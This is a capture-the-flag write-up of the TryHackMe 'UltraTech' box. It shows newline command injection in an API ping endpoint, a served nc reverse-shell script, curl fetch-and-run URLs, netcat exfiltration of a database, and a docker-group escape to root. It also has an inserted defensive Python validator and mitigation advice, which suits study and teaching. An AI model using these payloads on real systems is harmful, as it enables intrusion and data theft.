UltraTech Write-up

Description

“UltraTech” is a boot2root machine on TryHackMe rated as intermediate difficulty. You have been contracted by UltraTech to pentest their infrastructure. It is a grey-box assessment: the only information you have is the company’s name and their server’s IP address.

Enumeration

First, Nmap was used to scan all ports on the target machine, followed by a script and version scan of the open ports.

sudo nmap -p- -oN nmap/all -vv 10.10.29.189
sudo nmap -p21,22,8081,31331 -sC -sV -O 10.10.29.189 -oN nmap/scripts -vv
[Screenshot: pinging the attacker machine through the API's ping endpoint]
[Screenshot: receiving the ping on the attacker machine]
http://10.10.29.189:8081/ping?ip=127.0.0.1%20%0a%20id

Initial Access

The following bash script was created and served by the attacker via HTTP.

#!/bin/bash

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.9.73.174 443 >/tmp/f
http://10.10.29.189:8081/ping?ip=127.0.0.1%20%0a%20curl%20http://<attacker ip>/shell.sh%20-o%20shell.sh
http://10.10.29.189:8081/ping?ip=127.0.0.1%20%0A%20bash%20shell.sh
[Screenshot: SQLite database file found on the box]
[Screenshot: exfiltration of the database via netcat]
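The foothold above comes from the API handing the ip parameter to a shell, where a URL-encoded newline (%0a) is enough to start a second command. The following is an added example, not code from the write-up or from UltraTech's API, of how such a ping endpoint should handle the parameter: an allowlist check that the value parses as exactly one IP address, and an argv list instead of a shell string. The handler is framework-independent (the write-up does not say what the API is written in), and the INJECTION_SAMPLES are constructed inputs shaped like the page's decoded payloads, used only to show that they are rejected.

```python
import ipaddress
import subprocess
from typing import List, Optional, Tuple

# Constructed samples shaped like the page's decoded ?ip= payloads (space, newline,
# command); used only to show that the allowlist rejects them.
INJECTION_SAMPLES = [
    "127.0.0.1 \n id",
    "127.0.0.1 \n bash shell.sh",
    "127.0.0.1;id",
    "8.8.8.8 && whoami",
    "",
]


def validate_ip(raw: object) -> Optional[str]:
    """Return the canonical form if raw is exactly one IPv4 or IPv6 literal, else None.

    Allowlist, not blocklist: anything that is not a bare address (whitespace,
    newlines, shell metacharacters, hostnames) fails to parse and is rejected.
    """
    if not isinstance(raw, str) or len(raw) > 45:   # 45 = longest textual IPv6
        return None
    try:
        # No .strip() here: "127.0.0.1 \n id" must fail, not be "cleaned up".
        return str(ipaddress.ip_address(raw))
    except ValueError:
        return None


def build_ping_command(raw: object) -> Optional[List[str]]:
    """argv list for ping, or None when the parameter is not a plain IP."""
    ip = validate_ip(raw)
    if ip is None:
        return None
    # Fixed argv list instead of a shell string: the process receives exactly these
    # arguments, so no separator inside `ip` can ever start a second command.
    return ["ping", "-c", "1", "-W", "2", ip]


def ping(raw: object) -> Tuple[int, str]:
    """Minimal handler body returning (http_status, body)."""
    cmd = build_ping_command(raw)
    if cmd is None:
        return 400, "invalid ip parameter"
    try:
        res = subprocess.run(cmd, capture_output=True, text=True, timeout=5, check=False)
    except (FileNotFoundError, subprocess.TimeoutExpired) as exc:
        return 500, "ping failed: " + type(exc).__name__
    return 200, res.stdout


if __name__ == "__main__":
    for sample in INJECTION_SAMPLES:
        print(repr(sample), "->", ping(sample)[0])
    print("127.0.0.1 ->", ping("127.0.0.1")[0])
```

The two defences are independent: even if the validation were bypassed, the argv list means there is no shell to interpret a newline or semicolon; and even if the code later grew a shell call, the allowlist leaves nothing but an address to pass through. A blocklist of "bad characters" gives neither guarantee, which is exactly the gap the newline payload exploits.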

Privilege Escalation to r00t

“r00t” is also a user on the box. Privilege escalation to “r00t” was possible because of password reuse.

Privilege Escalation

The privilege escalation to root could be accomplished by abusing the docker command, since r00t is a member of the docker group and can mount the host's /root directory into a container.

docker run -v /root:/mnt -it bash

Mitigation

The input filter on the API's ping endpoint should be hardened. Furthermore, functionality that is not ready for use should not be deployed on a live machine. Passwords should not be hashed with the MD5 hash function; an appropriate password hashing function such as PBKDF2 should be used instead. The password policy should prohibit the use of common passwords as well as password reuse, and users of the organisation should be encouraged to follow it. Also keep in mind that adding a user to the docker group effectively gives them root rights, so the user r00t should not be in the docker group unless this is needed.
